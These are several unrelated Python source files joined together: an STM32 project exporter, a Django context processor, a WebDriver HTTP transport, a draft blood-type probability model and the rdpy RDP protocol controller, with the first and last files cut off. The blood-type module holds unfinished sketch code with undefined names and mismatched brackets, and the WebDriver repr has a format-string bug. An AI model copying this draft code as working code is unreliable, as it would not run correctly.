item.startswith('-D'): opts[compiler]['defines'].append(str(item[2:])) else: otherList.append(item) opts[compiler]['other'] = ' '.join(otherList) # Assembler options for as_def in opts['as']['defines']: if '=' in as_def: opts['as']['other'] += ' --defsym ' + as_def else: opts['as']['other'] += ' --defsym ' + as_def + '=1' def generate(self): """ Generate the .project and .cproject files. """ options = {} if not self.resources.linker_script: raise NotSupportedException("No linker script found.") print('\nCreate a System Workbench for STM32 managed project') print('Project name: {0}'.format(self.project_name)) print('Target: {0}'.format(self.toolchain.target.name)) print('Toolchain: {0}'.format(self.TOOLCHAIN) + '\n') self.resources.win_to_unix() libraries = [] for lib in self.libraries: library, _ = splitext(basename(lib)) libraries.append(library[3:]) self.system_libraries = [ 'stdc++', 'supc++', 'm', 'c', 'gcc', 'nosys' ] profiles = self.get_all_profiles() self.as_defines = [s.replace('"', '&quot;') for s in self.toolchain.get_symbols(True)] self.c_defines = [s.replace('"', '&quot;') for s in self.toolchain.get_symbols()] self.cpp_defines = self.c_defines self.include_path = [] for s in self.resources.inc_dirs: self.include_path.append("../" + self.filter_dot(s)) print('Include folders: {0}'.format(len(self.include_path))) self.compute_exclusions() print('Exclude folders: {0}'.format(len(self.excluded_folders))) ld_script = self.filter_dot(self.resources.linker_script) print('Linker script: {0}'.format(ld_script)) lib_dirs = [self.filter_dot(s) for s in self.resources.lib_dirs] preproc_cmd = basename(self.toolchain.preproc[0]) + " " + " ".join(self.toolchain.preproc[1:]) for id in ['debug', 'release']: opts = {} opts['common'] = {} opts['as'] = {} opts['c'] = {} opts['cpp'] = {} opts['ld'] = {} opts['id'] = id opts['name'] = opts['id'].capitalize() profile = profiles[id] # A small hack, do not bother with src_path again, # pass an empty string to avoid crashing. src_paths = [''] toolchain = prepare_toolchain( src_paths, "", self.toolchain.target.name, self.TOOLCHAIN, build_profile=[profile]) # Hack to fill in build_dir toolchain.build_dir = self.toolchain.build_dir flags = self.toolchain_flags(toolchain) # Most GNU ARM Eclipse options have a parent, # either debug or release. if '-O0' in flags['common_flags'] or '-Og' in flags['common_flags']: opts['parent_id'] = 'debug' else: opts['parent_id'] = 'release' self.process_options(opts, flags) opts['c']['defines'] = self.c_defines opts['cpp']['defines'] = self.cpp_defines opts['as']['defines'] = self.as_defines self.process_sw_options(opts, flags) opts['ld']['library_paths'] = [ self.filter_dot(s) for s in self.resources.lib_dirs] opts['ld']['user_libraries'] = libraries opts['ld']['system_libraries'] = self.system_libraries opts['ld']['script'] = "linker-script-" + id + ".ld" # Unique IDs used in multiple places. uid = {} uid['config'] = u.id uid['tool_c_compiler'] = u.id uid['tool_c_compiler_input'] = u.id uid['tool_cpp_compiler'] = u.id uid['tool_cpp_compiler_input'] = u.id opts['uid'] = uid options[id] = opts ctx = { 'name': self.project_name, 'platform': platform, 'include_paths': self.include_path, 'config_header': self.config_header_ref.name, 'exclude_paths': '|'.join(self.excluded_folders), 'ld_script': ld_script, 'library_paths': lib_dirs, 'object_files': self.resources.objects, 'libraries': libraries, 'board_name': self.BOARDS[self.target.upper()]['name'], 'mcu_name': self.BOARDS[self.target.upper()]['mcuId'], 'cpp_cmd': preproc_cmd, 'options': options, # id property of 'u' will generate new random identifier every time # when called. 'u': u } self.__gen_dir('.settings') self.gen_file('sw4stm32/language_settings_commom.tmpl', ctx, '.settings/language.settings.xml') self.gen_file('sw4stm32/project_common.tmpl', ctx, '.project') self.gen_file('sw4stm32/cproject_common.tmpl', ctx, '.cproject') self.gen_file('sw4stm32/makefile.targets.tmpl', ctx, 'makefile.targets', trim_blocks=True, lstrip_blocks=True) self.gen_file('sw4stm32/launch.tmpl', ctx, self.project_name + ' ' + options['debug']['name'] + '.launch') @staticmethod def clean(_): shutil.rmtree(".settings")
# -*- coding: utf-8 -*- from __future__ import print_function from __future__ import unicode_literals from __future__ import division import copy from django.conf import settings from django.contrib.staticfiles import finders from django.utils.timezone import now from django.utils.translation import ugettext as _ from treemap.util import get_last_visited_instance from treemap.models import InstanceUser REPLACEABLE_TERMS = { 'Resource': {'singular': _('Resource'), 'plural': _('Resources')} } def global_settings(request): last_instance = get_last_visited_instance(request) if hasattr(request, 'user') and request.user.is_authenticated(): last_effective_instance_user =\ request.user.get_effective_instance_user(last_instance) _update_last_seen(last_effective_instance_user) else: if hasattr(request, 'instance'): instance = request.instance default_role = instance.default_role last_effective_instance_user = InstanceUser( role=default_role, instance=instance) else: last_effective_instance_user = None if hasattr(request, 'instance') and request.instance.logo: logo_url = request.instance.logo.url else: logo_url = settings.STATIC_URL + "img/logo.png" try: comment_file_path = finders.find('version.txt') with open(comment_file_path, 'r') as f: header_comment = f.read() except: header_comment = "Version information not available\n" term = copy.copy(REPLACEABLE_TERMS) if hasattr(request, 'instance'): term.update(request.instance.config.get('terms', {})) ctx = { 'SITE_ROOT': settings.SITE_ROOT, 'settings': settings, 'last_instance': last_instance, 'last_effective_instance_user': last_effective_instance_user, 'logo_url': logo_url, 'header_comment': header_comment, 'term': term, } return ctx def _update_last_seen(last_effective_instance_user): # Update the instance user's "last seen" date if necessary. # Done here instead of in middleware to avoid looking up # the request's InstanceUser again. iu = last_effective_instance_user today = now().date() if iu and iu.id and (not iu.last_seen or iu.last_seen < today): iu.last_seen = today iu.save_base()
import json import select from six import text_type, PY3 from six.moves.http_client import HTTPConnection from six.moves.urllib import parse as urlparse from . import error """Implements HTTP transport for the WebDriver wire protocol.""" class Response(object): """ Describes an HTTP response received from a remote end whose body has been read and parsed as appropriate. """ def __init__(self, status, body, headers): self.status = status self.body = body self.headers = headers def __repr__(self): cls_name = self.__class__.__name__ if self.error: return "<%s status=%s error=%s>" % (cls_name, self.status, repr(self.error)) return "<% status=%s body=%s>" % (cls_name, self.status, json.dumps(self.body)) def __str__(self): return json.dumps(self.body, indent=2) @property def error(self): if self.status != 200: return error.from_response(self) return None @classmethod def from_http(cls, http_response, decoder=json.JSONDecoder, **kwargs): try: body = json.load(http_response, cls=decoder, **kwargs) headers = dict(http_response.getheaders()) except ValueError: raise ValueError("Failed to decode response body as JSON:\n" + http_response.read()) return cls(http_response.status, body, headers) class HTTPWireProtocol(object): """ Transports messages (commands and responses) over the WebDriver wire protocol. Complex objects, such as ``webdriver.Element``, ``webdriver.Frame``, and ``webdriver.Window`` are by default not marshaled to enable use of `session.transport.send` in WPT tests:: session = webdriver.Session("", 4444) response = transport.send("GET", "element/active", None) print response.body["value"] # => {u'element-6066-11e4-a52e-4f735466cecf': u'<uuid>'} Automatic marshaling is provided by ``webdriver.protocol.Encoder`` and ``webdriver.protocol.Decoder``, which can be passed in to ``HTTPWireProtocol.send`` along with a reference to the current ``webdriver.Session``:: session = webdriver.Session("", 4444) response = transport.send("GET", "element/active", None, encoder=protocol.Encoder, decoder=protocol.Decoder, session=session) print response.body["value"] # => webdriver.Element """ def __init__(self, host, port, url_prefix="/"): """ Construct interface for communicating with the remote server. :param url: URL of remote WebDriver server. :param wait: Duration to wait for remote to appear. """ self.host = host self.port = port self.url_prefix = url_prefix self._conn = None self._last_request_is_blocked = False def __del__(self): self.close() def close(self): """Closes the current HTTP connection, if there is one.""" if self._conn: self._conn.close() @property def connection(self): """Gets the current HTTP connection, or lazily creates one.""" if not self._conn: conn_kwargs = {} if not PY3: conn_kwargs["strict"] = True # We are not setting an HTTP timeout other than the default when the # connection its created. The send method has a timeout value if needed. self._conn = HTTPConnection(self.host, self.port, **conn_kwargs) return self._conn def url(self, suffix): """ From the relative path to a command end-point, craft a full URL suitable to be used in a request to the HTTPD. """ return urlparse.urljoin(self.url_prefix, suffix) def send(self, method, uri, body=None, headers=None, encoder=json.JSONEncoder, decoder=json.JSONDecoder, timeout=None, **codec_kwargs): """ Send a command to the remote. The request `body` must be JSON serialisable unless a custom `encoder` has been provided. This means complex objects such as ``webdriver.Element``, ``webdriver.Frame``, and `webdriver.Window`` are not automatically made into JSON. This behaviour is, however, provided by ``webdriver.protocol.Encoder``, should you want it. Similarly, the response body is returned au natural as plain JSON unless a `decoder` that converts web element references to ``webdriver.Element`` is provided. Use ``webdriver.protocol.Decoder`` to achieve this behaviour. The client will attempt to use persistent HTTP connections. :param method: `GET`, `POST`, or `DELETE`. :param uri: Relative endpoint of the requests URL path. :param body: Body of the request. Defaults to an empty dictionary if ``method`` is `POST`. :param headers: Additional dictionary of headers to include in the request. :param encoder: JSON encoder class, which defaults to ``json.JSONEncoder`` unless specified. :param decoder: JSON decoder class, which defaults to ``json.JSONDecoder`` unless specified. :param codec_kwargs: Surplus arguments passed on to `encoder` and `decoder` on construction. :return: Instance of ``webdriver.transport.Response`` describing the HTTP response received from the remote end. :raises ValueError: If `body` or the response body are not JSON serialisable. """ if body is None and method == "POST": body = {} payload = None if body is not None: try: payload = json.dumps(body, cls=encoder, **codec_kwargs) except ValueError: raise ValueError("Failed to encode request body as JSON:\n" "%s" % json.dumps(body, indent=2)) # When the timeout triggers, the TestRunnerManager thread will reuse # this connection to check if the WebDriver its alive and we may end # raising an httplib.CannotSendRequest exception if the WebDriver is # not responding and this httplib.request() call is blocked on the # runner thread. We use the boolean below to check for that and restart # the connection in that case. self._last_request_is_blocked = True response = self._request(method, uri, payload, headers, timeout=None) self._last_request_is_blocked = False return Response.from_http(response, decoder=decoder, **codec_kwargs) def _request(self, method, uri, payload, headers=None, timeout=None): if isinstance(payload, text_type): payload = payload.encode("utf-8") if headers is None: headers = {} headers.update({"Connection": "keep-alive"}) url = self.url(uri) if self._last_request_is_blocked or self._has_unread_data(): self.close() self.connection.request(method, url, payload, headers) # timeout for request has to be set just before calling httplib.getresponse() # and the previous value restored just after that, even on exception raised try: if timeout: previous_timeout = self._conn.gettimeout() self._conn.settimeout(timeout) response = self.connection.getresponse() finally: if timeout: self._conn.settimeout(previous_timeout) return response def _has_unread_data(self): return self._conn and self._conn.sock and select.select([self._conn.sock], [], [], 0)[0]
#!/usr/bin/env python """ Phenotype: 0, A, B, AB Genotype: 00, 0A, A0, AA, 0B, B0, BB, AB P(P): 0 .37 A .38 B .17 AB .08 P(P|G) 0 | 00 1 A | 0A 1 A | A0 1 A | AA 1 B | 0B 1 B | B0 1 B | BB 1 AB | AB 1 otherwise 0 """ from prob import P from enum import Enum class Phenotype(Enum): O = 0 A = 1 B = 2 AB = 3 def genPhenotypeSet(name): return Enum("Phenotype_"+name,"0 A B AB", module=__name__) def genPhenotypeGivenGenotypeProb(name,genotype): pset = genPhenotypeSet(name) return "p_NAME(TOP_Parent)_Phenotype_Genotype" def genGenotypeGivenParentsGenotype(name,mother,father): return "p_" class Genotype(Enum): OO = 1 OA = 2 AO = 3 AA = 4 OB = 5 BO = 6 BB = 7 AB = 8 BA = 9 def genGenotypeSet(name): return Enum("Genotype_"+name, "OO OA AO AA OB BO BB AB BA", module=__name__) """ # wikipedia - eu p_Phenotype = P(Phenotype) p_Phenotype.table([ [Phenotype.O, 0.37], [Phenotype.A, 0.38], [Phenotype.B, 0.17], [Phenotype.AB,0.08]]) # http://anthro.palomar.edu/blood/table_of_ABO_and_Rh_blood_type_frequencies_in_US.htmw p_Phenotype = P(Phenotype) p_Phenotype.table([ [Phenotype.O, 0.44], [Phenotype.A, 0.44], [Phenotype.B, 0.10], [Phenotype.AB,0.04]]) p_Genotype = P(Genotype) p_Genotype.table([ [Genotype.OO, 1.0], [Genotype.OA, 1.0], [Genotype.AO, 1.0], [Genotype.AA, 1.0], [Genotype.OB, 1.0], [Genotype.BO, 1.0], [Genotype.BB, 1.0], [Genotype.AB, 1.0], [Genotype.BA, 1.0]) p_Genotype.normalize() # https://en.wikipedia.org/wiki/Blood_type_distribution_by_country # http://www.sciencedirect.com/science/article/pii/S1110863011000796 # https://www.hindawi.com/journals/bmri/2014/286810/ p_Phenotype_Genotype = P(Phenotype).given(Genotype) p_Phenotype_Genotype.table([ [Phenotype.O, Genotype.OO, 1.0], [Phenotype.A, Genotype.OA, 1.0], [Phenotype.A, Genotype.AO, 1.0], [Phenotype.A, Genotype.AA, 1.0], [Phenotype.B, Genotype.OB, 1.0], [Phenotype.B, Genotype.BO, 1.0], [Phenotype.B, Genotype.BB, 1.0], [Phenotype.AB, Genotype.AB, 1.0], [Phenotype.AB, Genotype.BA, 1.0]]) p_Genotype_Phenotype = P(Genotype).given(Phenotype) p_Genotype_Phenotype.table([ [Genotype.OO, Phenotype.O, 1.0], [Genotype.OA, Phenotype.A, 0.33], [Genotype.AO, Phenotype.A, 0.33], [Genotype.AA, Phenotype.A, 0.34], [Genotype.OB, Phenotype.B, 0.33], [Genotype.BO, Phenotype.B, 0.33], [Genotype.BB, Phenotype.B, 0.34], [Genotype.AB, Phenotype.AB, 1.0], [Genotype.BA, Phenotype.AB, 1.0]]) p_PhenotypeGenotype = p_Genotype_Phenotype * p_Phenotype p_Genotype_ParentLeft = P(Genotype).given(Genotype) p_Genotype_ParentLeft.table([ [Genotype.OO, L_Genotype.OO, 1.], [Genotype.OO, L_Genotype.OA, 1.], [Genotype.OO, L_Genotype.OB, 1.], [Genotype.AO, L_Genotype.AO, 1.], [Genotype.AO, L_Genotype.AA, 1.], [Genotype.AO, L_Genotype.AB, 1.], [Genotype.AB, L_Genotype.AO, 1.], [Genotype.AB, L_Genotype.AA, 1.], [Genotype.AB, L_Genotype.AB, 1.], [Genotype.BO, L_Genotype.BO, 1.], [Genotype.BO, L_Genotype.BB, 1.], [Genotype.BO, L_Genotype.BA, 1.], [Genotype.BA, L_Genotype.BO, 1.], [Genotype.BA, L_Genotype.BB, 1.], [Genotype.BA, L_Genotype.BA, 1.]]) p_Genotype_ParentRight = P(Genotype).given(Genotype) p_Genotype_ParentRight.table([ [Genotype.OO, R_Genotype.OO, 1.], [Genotype.OO, R_Genotype.AO, 1.], [Genotype.OO, R_Genotype.BO, 1.], [Genotype.OA, R_Genotype.OA, 1.], [Genotype.OA, R_Genotype.AA, 1.], [Genotype.OA, R_Genotype.BA, 1.], [Genotype.BA, R_Genotype.OA, 1.], [Genotype.BA, R_Genotype.AA, 1.], [Genotype.BA, R_Genotype.BA, 1.], [Genotype.OB, R_Genotype.OB, 1.], [Genotype.OB, R_Genotype.BB, 1.], [Genotype.OB, R_Genotype.AB, 1.], [Genotype.AB, R_Genotype.OB, 1.], [Genotype.AB, R_Genotype.BB, 1.], [Genotype.AB, R_Genotype.AB, 1.]]) p_Genotype_Parent = P(Genotype).given(L_Genotype,R_Genotype) p_Genotype_Parent.table([ [Genotype.OO, L_Genotype.OO, R.Genotype.OO, 1], [Genotype.OO, L_Genotype.AO, R.Genotype.OO, 1], [Genotype.OO, L_Genotype.OO, R.Genotype.OO, 1], [Genotype.OO, L_Genotype.OO, R.Genotype.OO, 1], [Genotype.OO, L_Genotype.OO, R.Genotype.OO, 1], [Genotype.OO, L_Genotype.OO, R.Genotype.OO, 1]]) # p_Genotype_Phenotype = p_PhenotypeGenotype / p_Phenotype """ """ P(P,G) = P(P|G)*P(G) P(P,G) = P(G|P)*P(P) P(G|P) = P(P|G)*P(G)/P(P) P(P|Pp): sum( P|PmPd, Pd) Grand Mom Pheno Uknown Parent Pheno | | | +--------+ | +------------------+ v | | Grand Mom Blood | | v v Mom Pheno Dad Pheno Step Mom Pheno | | | | | | | | | | | +-------------+ | | | | | | | | +-------+ +-+ +------+ +------+--+ +-+ +---+ | v v | | | v | | Step Mom Blood Mom Blood | | | Dad Blood v v | | | Step Sister Pheno v v +-----------+ | Child Pheno v v | Sibiling Pheno Step Sister Blood v | Child Blood v Sibiling Blood """ """ Possible Node instances: blood : value 0 : .37 A : .38 B : .17 AB : .08 child_blood, parent_blood : value A A : .3 0 A : .2 0 AB : 0 child_blood, parent_blood | grand_blood : value A A | A : .3 0 A | 0 : .2 0 AB | 0 : 0 """
# # Copyright (c) 2014-2015 Sylvain Peyrefitte # # This file is part of rdpy. # # rdpy is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # """ Use to manage RDP stack in twisted """ from rdpy.core import layer from rdpy.core.error import CallPureVirtualFuntion, InvalidValue import pdu.layer import pdu.data import pdu.caps import rdpy.core.log as log import tpkt, x224, sec from t125 import mcs, gcc from nla import cssp, ntlm class SecurityLevel(object): """ @summary: RDP security level """ RDP_LEVEL_RDP = 0 RDP_LEVEL_SSL = 1 RDP_LEVEL_NLA = 2 class RDPClientController(pdu.layer.PDUClientListener): """ Manage RDP stack as client """ def __init__(self): #list of observer self._clientObserver = [] #PDU layer self._pduLayer = pdu.layer.Client(self) #secure layer self._secLayer = sec.Client(self._pduLayer) #multi channel service self._mcsLayer = mcs.Client(self._secLayer) #transport pdu layer self._x224Layer = x224.Client(self._mcsLayer) #transport packet (protocol layer) self._tpktLayer = tpkt.TPKT(self._x224Layer) #fastpath stack self._pduLayer.initFastPath(self._secLayer) self._secLayer.initFastPath(self._tpktLayer) #is pdu layer is ready to send self._isReady = False def getProtocol(self): """ @return: return Protocol layer for twisted In case of RDP TPKT is the Raw layer """ return cssp.CSSP(self._tpktLayer, ntlm.NTLMv2(self._secLayer._info.domain.value, self._secLayer._info.userName.value, self._secLayer._info.password.value)) def getColorDepth(self): """ @return: color depth set by the server (15, 16, 24) """ return self._pduLayer._serverCapabilities[pdu.caps.CapsType.CAPSTYPE_BITMAP].capability.preferredBitsPerPixel.value def getKeyEventUniCodeSupport(self): """ @return: True if server support unicode input """ return self._pduLayer._serverCapabilities[pdu.caps.CapsType.CAPSTYPE_INPUT].capability.inputFlags.value & pdu.caps.InputFlags.INPUT_FLAG_UNICODE def setPerformanceSession(self): """ @summary: Set particular flag in RDP stack to avoid wall-paper, theme, menu animation etc... """ self._secLayer._info.extendedInfo.performanceFlags.value = sec.PerfFlag.PERF_DISABLE_WALLPAPER | sec.PerfFlag.PERF_DISABLE_MENUANIMATIONS | sec.PerfFlag.PERF_DISABLE_CURSOR_SHADOW | sec.PerfFlag.PERF_DISABLE_THEMING | sec.PerfFlag.PERF_DISABLE_FULLWINDOWDRAG def setScreen(self, width, height): """ @summary: Set screen dim of session @param width: width in pixel of screen @param height: height in pixel of screen """ #set screen definition in MCS layer self._mcsLayer._clientSettings.getBlock(gcc.MessageType.CS_CORE).desktopHeight.value = height self._mcsLayer._clientSettings.getBlock(gcc.MessageType.CS_CORE).desktopWidth.value = width def setUsername(self, username): """ @summary: Set the username for session @param username: {string} username of session """ #username in PDU info packet self._secLayer._info.userName.value = username self._secLayer._licenceManager._username = username def setPassword(self, password): """ @summary: Set password for session @param password: {string} password of session """ self.setAutologon() self._secLayer._info.password.value = password def setDomain(self, domain): """ @summary: Set the windows domain of session @param domain: {string} domain of session """ self._secLayer._info.domain.value = domain def setAutologon(self): """ @summary: enable autologon """ self._secLayer._info.flag |= sec.InfoFlag.INFO_AUTOLOGON def setAlternateShell(self, appName): """ @summary: set application name of app which start at the begining of session @param appName: {string} application name """ self._secLayer._info.alternateShell.value = appName def setKeyboardLayout(self, layout): """ @summary: keyboard layout @param layout: us | fr """ if layout == "fr": self._mcsLayer._clientSettings.CS_CORE.kbdLayout.value = gcc.KeyboardLayout.FRENCH elif layout == "us": self._mcsLayer._clientSettings.CS_CORE.kbdLayout.value = gcc.KeyboardLayout.US def setHostname(self, hostname): """ @summary: set hostname of machine """ self._mcsLayer._clientSettings.CS_CORE.clientName.value = hostname[:15] + "\x00" * (15 - len(hostname)) self._secLayer._licenceManager._hostname = hostname def setSecurityLevel(self, level): """ @summary: Request basic security @param level: {SecurityLevel} """ if level == SecurityLevel.RDP_LEVEL_RDP: self._x224Layer._requestedProtocol = x224.Protocols.PROTOCOL_RDP elif level == SecurityLevel.RDP_LEVEL_SSL: self._x224Layer._requestedProtocol = x224.Protocols.PROTOCOL_SSL elif level == SecurityLevel.RDP_LEVEL_NLA: self._x224Layer._requestedProtocol = x224.Protocols.PROTOCOL_SSL | x224.Protocols.PROTOCOL_HYBRID def addClientObserver(self, observer): """ @summary: Add observer to RDP protocol @param observer: new observer to add """ self._clientObserver.append(observer) def removeClientObserver(self, observer): """ @summary: Remove observer to RDP protocol stack @param observer: observer to remove """ for i in range(0, len(self._clientObserver)): if self._clientObserver[i] == observer: del self._clientObserver[i] return def onUpdate(self, rectangles): """ @summary: Call when a bitmap data is received from update PDU @param rectangles: [pdu.BitmapData] struct """ for observer in self._clientObserver: #for each rectangle in update PDU for rectangle in rectangles: observer.onUpdate(rectangle.destLeft.value, rectangle.destTop.value, rectangle.destRight.value, rectangle.destBottom.value, rectangle.width.value, rectangle.height.value, rectangle.bitsPerPixel.value, rectangle.flags.value & pdu.data.BitmapFlag.BITMAP_COMPRESSION, rectangle.bitmapDataStream.value) def onReady(self): """ @summary: Call when PDU layer is connected """ self._isReady = True #signal all listener for observer in self._clientObserver: observer.onReady() def onSessionReady(self): """ @summary: Call when Windows session is ready (connected) """ self._isReady = True #signal all listener for observer in self._clientObserver: observer.onSessionReady() def onClose(self): """ @summary: Event call when RDP stack is closed """ self._isReady = False for observer in self._clientObserver: observer.onClose() def sendPointerEvent(self, x, y, button, isPressed): """ @summary: send pointer events @param x: x position of pointer @param y: y position of pointer @param button: 1 or 2 or 3 @param isPressed: true if button is pressed or false if it's released """ if not self._isReady: return try: if button == 4 or button == 5: event = pdu.data.PointerExEvent() if isPressed: event.pointerFlags.value |= pdu.data.PointerExFlag.PTRXFLAGS_DOWN if button == 4: event.pointerFlags.value |= pdu.data.PointerExFlag.PTRXFLAGS_BUTTON1 elif button == 5: event.pointerFlags.value |= pdu.data.PointerExFlag.PTRXFLAGS_BUTTON2 else: event = pdu.data.PointerEvent() if isPressed: event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_DOWN if button == 1: event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_BUTTON1 elif button == 2: event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_BUTTON2 elif button == 3: event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_BUTTON3 else: event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_MOVE # position event.xPos.value = x event.yPos.value = y # send proper event self._pduLayer.sendInputEvents([event]) except InvalidValue: log.info("try send pointer event with incorrect position") def sendWheelEvent(self, x, y, step, isNegative = False, isHorizontal = False): """ @summary: Send a mouse wheel event @param x: x position of pointer @param y: y position of pointer @param step: number of step rolled @param isHorizontal: horizontal wheel (default is vertical) @param isNegative: is upper (default down) """ if not self._isReady: return try: event = pdu.data.PointerEvent() if isHorizontal: event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_HWHEEL else: event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_WHEEL if isNegative: event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_WHEEL_NEGATIVE event.pointerFlags.value |= (step & pdu.data.PointerFlag.WheelRotationMask) #position event.xPos.value = x event.yPos.value = y #send proper event self._pduLayer.sendInputEvents([event]) except InvalidValue: log.info("try send wheel event with incorrect position") def sendKeyEventScancode(self, code, isPressed, extended = False): """ @summary: Send a scan code to RDP stack @param code: scan code @param isPressed: True if key is pressed and false if it's released @param extended: {boolean} extended scancode like ctr or win button """ if not self._isReady: return try: event = pdu.data.ScancodeKeyEvent() event.keyCode.value = code if not isPressed: event.keyboardFlags.value |= pdu.data.KeyboardFlag.KBDFLAGS_RELEASE if extended: event.keyboardFlags.value |= pdu.data.KeyboardFlag.KBDFLAGS_EXTENDED #send event self._pduLayer.sendInputEvents([event]) except InvalidValue: log.info("try send bad key event") def sendKeyEventUnicode(self, code, isPressed): """ @summary: Send a scan code to RDP stack @param code: unicode @param isPressed: True if key is pressed and false if it's released """ if not self._isReady: return try: event = pdu.data.UnicodeKeyEvent() event.unicode.value = code if not isPressed: event.keyboardFlags.value |= pdu.data.KeyboardFlag.KBDFLAGS_RELEASE #send event self._pduLayer.sendInputEvents([event]) except InvalidValue: log.info("try send bad key event") def sendRefreshOrder(self, left, top, right, bottom): """ @summary: Force server to resend a particular zone @param left: left coordinate @param top: top coordinate @param right: right coordinate @param bottom: bottom coordinate """ refreshPDU = pdu.data.RefreshRectPDU() rect = pdu.data.InclusiveRectangle() rect.left.value = left rect.top.value = top rect.right.value = right rect.bottom.value = bottom refreshPDU.areasToRefresh._array.append(rect) self._pduLayer.sendDataPDU(refreshPDU) def close(self): """ @summary: Close protocol stack """ self._pduLayer.close() class RDPServerController(pdu.layer.PDUServerListener): """ @summary: Controller use in server side mode """ def __init__(self, colorDepth, privateKeyFileName = None, certificateFileName = None): """ @param privateKeyFileName: file contain server private key @param certficiateFileName: file that contain public key @param colorDepth: 15, 16, 24 """ self._isReady = False #list of observer self._serverObserver = [] #build RDP protocol stack self._pduLayer = pdu.layer.Server(self) #secure layer self._secLayer = sec.Server(self._pduLayer) #multi channel service self._mcsLayer = mcs.Server(self._secLayer) #transport pdu layer self._x224Layer = x224.Server(self._mcsLayer, privateKeyFileName, certificateFileName, False) #transport packet (protocol layer) self._tpktLayer = tpkt.TPKT(self._x224Layer) #fastpath stack self._pduLayer.initFastPath(self._secLayer) self._secLayer.initFastPath(self._tpktLayer) #set color depth of session self.setColorDepth(colorDepth) def close(self): """ @summary: Close protocol stack """ self._pduLayer.close() def getProtocol(self): """ @return: the twisted protocol layer in RDP case is TPKT layer """ return self._tpktLayer def getHostname(self): """ @return: name of client (information done by RDP) """ return self._mcsLayer._clientSettings.CS_CORE.clientName.value.strip('\x00') def getUsername(self): """ @summary: Must be call after on ready event else always empty string @return: username send by client may be an empty string """ return self._secLayer._info.userName.value def getPassword(self): """ @summary: Must be call after on ready event else always empty string @return: password send by client may be an empty string """ return self._secLayer._info.password.value def getDomain(self): """ @summary: Must be call after on ready event else always empty string @return: domain send by client may be an empty string """ return self._secLayer._info.domain.value def getCredentials(self): """ @summary: Must be call after on ready event else always empty string @return: tuple(domain, username, password) """ return (self.getDomain(), self.getUsername(), self.getPassword()) def getColorDepth(self): """ @return: color depth define by server """ return self._colorDepth def getScreen(self): """ @return: tuple(width, height) of client asked screen """ bitmapCap = self._pduLayer._clientCapabilities[pdu.caps.CapsType.CAPSTYPE_BITMAP].capability return (bitmapCap.desktopWidth.value, bitmapCap.desktopHeight.value) def addServerObserver(self, observer): """ @summary: Add observer to RDP protocol @param observer: new observer to add """ self._serverObserver.append(observer) def setColorDepth(self, colorDepth): """ @summary: Set color depth of session if PDU stack is already connected send a deactive-reactive sequence and an onReady message is re send when client is ready @param colorDepth: {integer} depth of session (15, 16, 24) """ self._colorDepth = colorDepth self._pduLayer._serverCapabilities[pdu.caps.CapsType.CAPSTYPE_BITMAP].capability.preferredBitsPerPixel.value = colorDepth if self._isReady: #restart connection sequence self._isReady = False self._pduLayer.sendPDU(pdu.data.DeactiveAllPDU()) def setKeyEventUnicodeSupport(self): """ @summary: Enable key event in unicode format """ self._pduLayer._serverCapabilities[pdu.caps.CapsType.CAPSTYPE_INPUT].capability.inputFlags.value |= pdu.caps.InputFlags.INPUT_FLAG_UNICODE def onReady(self): """ @summary: RDP stack is now ready """ self._isReady = True for observer in self._serverObserver: observer.onReady() def onClose(self): """ @summary: Event call when RDP stack is closed """ self._isReady = False for observer in self._serverObserver: observer.onClose() def onSlowPathInput(self, slowPathInputEvents): """ @summary: Event call when slow path input are available @param slowPathInputEvents: [data.SlowPathInputEvent] """ for observer in self._serverObserver: for event in slowPathInputEvents: #scan code if event.messageType.value == pdu.data.InputMessageType.INPUT_EVENT_SCANCODE: observer.onKeyEventScancode(event.slowPathInputData.keyCode.value, not (event.slowPathInputData.keyboardFlags.value & pdu.data.KeyboardFlag.KBDFLAGS_RELEASE), bool(event.slowPathInputData.keyboardFlags.value & pdu.data.KeyboardFlag.KBDFLAGS_EXTENDED)) #unicode elif event.messageType.value == pdu.data.InputMessageType.INPUT_EVENT_UNICODE: observer.onKeyEventUnicode(event.slowPathInputData.unicode.value, not (event.slowPathInputData.keyboardFlags.value & pdu.data.KeyboardFlag.KBDFLAGS_RELEASE)) #mouse events elif event.messageType.value == pdu.data.InputMessageType.INPUT_EVENT_MOUSE: isPressed = event.slowPathInputData.pointerFlags.value & pdu.data.PointerFlag.PTRFLAGS_DOWN button = 0 if event.slowPathInputData.pointerFlags.value & pdu.data.PointerFlag.PTRFLAGS_BUTTON1: button = 1 elif event.slowPathInputData.pointerFlags.value & pdu.data.PointerFlag.PTRFLAGS_BUTTON2: button = 2 elif event.slowPathInputData.pointerFlags.value & pdu.data.PointerFlag.PTRFLAGS_BUTTON3: button = 3 observer.onPointerEvent(event.slowPathInputData.xPos.value, event.slowPathInputData.yPos.value, button, isPressed) elif event.messageType.value == pdu.data.InputMessageType.INPUT_EVENT_MOUSEX: isPressed = event.slowPathInputData.pointerFlags.value & pdu.data.PointerExFlag.PTRXFLAGS_DOWN button = 0 if event.slowPathInputData.pointerFlags.value & pdu.data.PointerExFlag.PTRXFLAGS_BUTTON1: button = 4 elif event.slowPathInputData.pointerFlags.value & pdu.data.PointerExFlag.PTRXFLAGS_BUTTON2: button = 5 observer.onPointerEvent(event.slowPathInputData.xPos.value, event.slowPathInputData.yPos.value, button, isPressed) def sendUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data): """ @summary: send bitmap update @param destLeft: xmin position @param destTop: ymin position @param destRight: xmax position because RDP can send bitmap with padding @param destBottom: ymax position because RDP can send bitmap with padding @param width: width of bitmap @param height: height of bitmap @param bitsPerPixel: number of bit per pixel @param isCompress: use RLE compression @param data: bitmap data """ if not self._isReady: return bitmapData = 